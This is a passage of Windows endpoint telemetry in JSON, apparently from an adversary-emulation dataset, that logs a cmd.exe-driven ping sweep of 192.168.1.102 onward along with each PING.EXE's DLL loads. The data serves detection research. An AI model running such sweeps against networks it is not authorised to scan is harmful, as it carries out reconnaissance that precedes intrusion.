"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572472140000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "event_type": "process", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572476840000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.102", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5012, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572476980000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "event_type": "process", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572481830000, - "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.103", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572481980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572481990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "event_type": "process", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572486840000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.104", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7916, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572486980000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "event_type": "process", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572491990000, - "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.105", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8152, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572492130000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572492140000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "event_type": "process", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572496840000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.106", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6008, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572496980000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "event_type": "process", - "pid": 6008, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572501990000, - "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.107", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4128, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572502140000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "event_type": "process", - "pid": 4128, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572506840000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.108", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7068, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572506980000, - "unique_pid": "{42FC7E13-CB82-5C05-0000-001001975201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 